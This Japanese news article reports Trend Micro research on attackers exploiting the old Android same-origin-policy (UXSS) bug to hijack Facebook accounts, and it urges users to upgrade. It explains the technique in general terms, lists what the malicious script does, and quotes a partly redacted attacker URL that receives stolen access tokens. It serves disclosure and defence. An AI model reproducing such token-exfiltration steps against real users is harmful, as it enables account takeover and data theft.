Androidの同一生成元ポリシー（SOP）脆弱性がハッカーにFacebookアカウントを乗っ取らせる

目次

• Androidの同一生成元ポリシー（SOP）脆弱性がFacebookアカウントを乗っ取るために使用されている
• バグ

Androidの同一生成元ポリシー（SOP）脆弱性がFacebookアカウントを乗っ取るために使用されている

パキスタンの研究者ラファイ・バロックによって発見されたレガシーAndroid同一生成元ポリシー（SOP）バグが、TrendMicro Labsによって発表された新しい研究により、はるかに広く使用されていることがわかりました。Trend Microの研究者サイモン・ファンは、Android OS 4.4未満のウェブブラウザのこの欠陥を悪用する攻撃のターゲットにされているFacebookユーザーの多くのケースを発見したと述べています。これはMetasploitコードが公開されており、多くのAndroid製造業者がまだこのバグを修正していないためです。

バグ

ラファイ・バロックによって発見されたこのバグは、古いバージョンのAndroidスマートフォンにおけるユニバーサルクロススクリプティングの脆弱性を許可します。この脆弱性は、WebViewコンポーネントに影響を与え、特定のHTMLオブジェクトの「data」属性をJavaScript URLスキームに置き換えるときに発生します。攻撃者はUXSSの欠陥を利用して、脆弱なブラウザウィンドウからクッキーのデータやページの内容をスクレイピングできます。このセキュリティホールは、WebViewを使用しているものを含むすべてのバージョンのAndroidオープンソースプラットフォーム（AOSP）ブラウザで悪用可能です。

Rapid7は、この欠陥のためのMetasploitコード（上記のリンク参照）を公開しており、攻撃者はこれを公に使用して、被害者にクラウドストレージアカウントに保存された悪意のあるJavaScriptファイルを提供しています。これは、ターゲットを特定のFacebookページに向けることで、悪意のある場所に誘導します。Trendの研究者ファンは、そのページにはFacebookのURLを内部フレームで読み込もうとする難読化されたJavaScriptコードが含まれていると述べています。

しかし、被害者は攻撃者がHTMLで設定したdivタグに従って、空白のページが読み込まれているのしか見えず、内部フレームは1ピクセルで表示されます。

ファンは、マルウェアが設置されると、攻撃者は被害者のFacebookアカウントでほぼ何でもできると述べています。JavaScriptコードは、被害者のFacebookアカウントで以下の活動を実行できます：

• 友達を追加
• Facebookページに「いいね！」やフォロー
• 購読を変更
• Facebookアプリにユーザーの公開プロフィール、友達リスト、誕生日情報、「いいね！」、友達の「いいね！」へのアクセスを許可
• 被害者のアクセストークンを盗み、それを自分のサーバーにアップロードする https://{BLOCKED}martforchristmas.website/walmart/j/index.php?cid=544fba6ac6988&access_token= $token;
• 正当なサービスを使用して分析データ（被害者の位置情報、HTTPリファラーなど）を収集する https://whos.{BLOCKED}ung.us/pingjs/
• 上記のサイトのコードに加えて、Trendは https://www.{BLOCKED}php.com/x/toplu.php で類似の攻撃を発見しました。Trendの研究者は、両者が同じ著者によって作成されたと考えています。なぜなら、いくつかの関数名やFacebookアプリのclient_idが共有されているからです。

Trend Microの研究者は、このマルウェアに関与するclient_idが「2254487659」であることを発見しました。これはBlackBerryによって維持されている公式のBlackBerryアプリです。

Trend Microは、その発見についてBlackBerryに連絡しました。彼らは、攻撃者がBlackBerryの信頼を利用しようとしており、マルウェアがユーザーのアクセストークンを盗もうとしていることをBlackBerryに通知しました。これにより、Facebook APIにリクエストを行い、ユーザーの情報を読み取ったり、被害者の代わりにFacebookにコンテンツを公開したりすることができます。Trendが彼らに連絡した後、BlackBerryは次の声明を発表しました：

「Android SOP脆弱性を利用するモバイルマルウェア（Android同一生成元ポリシーバイパスエクスプロイト）は、モバイルデバイスプラットフォームに関係なくFacebookユーザーをターゲットにするように設計されています。しかし、私たちのFacebookウェブアプリを使用することで、信頼されたBlackBerryブランド名を利用しようとしています。BlackBerryは、Trend MicroおよびFacebookと連携して、この攻撃を検出し、軽減するために継続的に取り組んでいます。この問題は、BlackBerryのハードウェア、ソフトウェア、またはネットワークへの脆弱性の結果ではないことに注意してください。」

現在、Trend Micro、Facebook、BlackBerryは協力して攻撃を検出し、新しいユーザーに対して実行されるのを防ぐために取り組んでいます。

Android SOPバグは2014年9月から存在しており、Android 4.4 KitKatまでのすべてのAndroidデバイスがこの欠陥に対して脆弱です。サイバー犯罪者によってこのバグを悪用し、不正行為を行うために使用できる古いバージョンのAndroid OSを実行しているAndroidスマートフォンは数百万台あります。ほとんどの安価なスマートフォンは古いバージョンのAndroidを実行しており、サイバー犯罪者の仕事をさらに容易にしています。Androidスマートフォンの所有者であれば、できるだけ早くスマートフォンを最新のAndroid 5.1ロリポップにアップグレードしてください。もしまだ古いバージョンのAndroidを実行しているスマートフォンを使用しているなら、今がそれを廃棄する時です。